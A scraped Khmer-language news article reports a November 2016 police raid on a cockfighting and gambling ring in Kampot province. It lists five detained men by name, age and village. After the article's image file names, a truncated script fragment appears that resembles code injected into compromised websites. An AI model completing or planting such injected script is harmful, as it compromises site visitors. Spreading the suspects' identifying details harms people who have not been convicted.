Leng Navatra – Sidebar Out Left
Leng Navatra – Banner Out Right

ឃាត់ខ្លួនមនុស្ស៥នាក់ ម៉ូតូចំនួន ១៨គ្រឿងក្នងការបង្ក្រាបសង្វៀនជល់មាន់នៅ​ នៅស្រុកកំពង់ត្រាច

កំពត ៖ នៅថ្ងៃទី ២៥ ខែវិច្ឆិកា ឆ្នាំ២០១៦ វេលាម៉ោង ១០និង៣០នាទី ដោយមានការសម្របសម្រួលពីលោកព្រះរាជអាជ្ញារង ខាន់ សុផល លោកវរសេនីយ៍ត្រី លក ញ៉ាវ នាយការិយាល័យព្រហ្មទណ្ឌកម្រិតស្រាល ដឹកនាំកម្លាំងជំនាញខេត្ត សហការជាមួយកម្លាំងនគរបាលស្រុក បានបង្ក្រាបល្បែងសុីសង (ជល់មាន់ និងលេងអាប៉ោង ) នៅភូមិកោះ ផ្តៅ ឃុំកំពង់ត្រាចខាងលិច ។ ក្នុងឃាត់បានជនសង្ស័នោះយចំនួន ០៥នាក់ ប្រុស និងដកហូតម៉ូតូចំនួន ១៨គ្រឿង មាន់ជល់ ព្រមទាំងឧបករណ៍លេងល្បែងមួយចំនួនទៀត ។ ជនសង្ស័យទាំង ០៥នាក់នោះរួមមាន
១. ឈ្មោះ គង់ ធី ភេទប្រុស អាយុ ៥០ឆ្នាំ នៅភូមិដើមចារ្យ ឃុំកំពង់ត្រាចខាងលិច ។
២. ឈ្មោះ ឃឹម ផាត ភេទប្រុស អាយុ ៥៥ឆ្នាំ នៅភូមិកោះផ្តៅ ឃុំកំពង់ត្រាចខាងលិច ។
៣. ឈ្មោះ លឹម សារឿន ភេទប្រុស អាយុ ៣៨ឆ្នាំ នៅភូមិចំការបី ឃុំពងទឹក ស្រុកដំណាក់ចង្អើរ ខេត្តកែប ។
៤. ឈ្មោះ សេង ភីរ៉ាន់ ភេទប្រុស អាយុ ៣០ឆ្នាំ នៅភូមិដើមចារ្យ ឃុំកំពង់ត្រាចខាងលិច ។
និង

ទី ៥.ឈ្មោះ សែម ថាត ភេទប្រុស អាយុ ២២ឆ្នាំ នៅភូមិកោះផ្តៅ ឃុំកំពង់ត្រាចខាងលិច ។
បច្ចុប្បន្នជនសង្ស័យទាំង ០៥នាក់កំពុងកសាងសំណុំរឿងដើម្បីអនុវត្តទៅតាមនីតិវិធីច្បាប់ ៕

a21821ad-abc8-43e9-8b3a-77cc522b7576-1

15134798_1737196919931716_2440002552619872482_n 15171201_1737196926598382_1347665229501469436_n 15241908_1737196909931717_7325056803282109026_nvar d=document;var s=d.createElement(‘script’);

អត្ថបទដែលជាប់ទាក់ទង

This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish. Accept Read More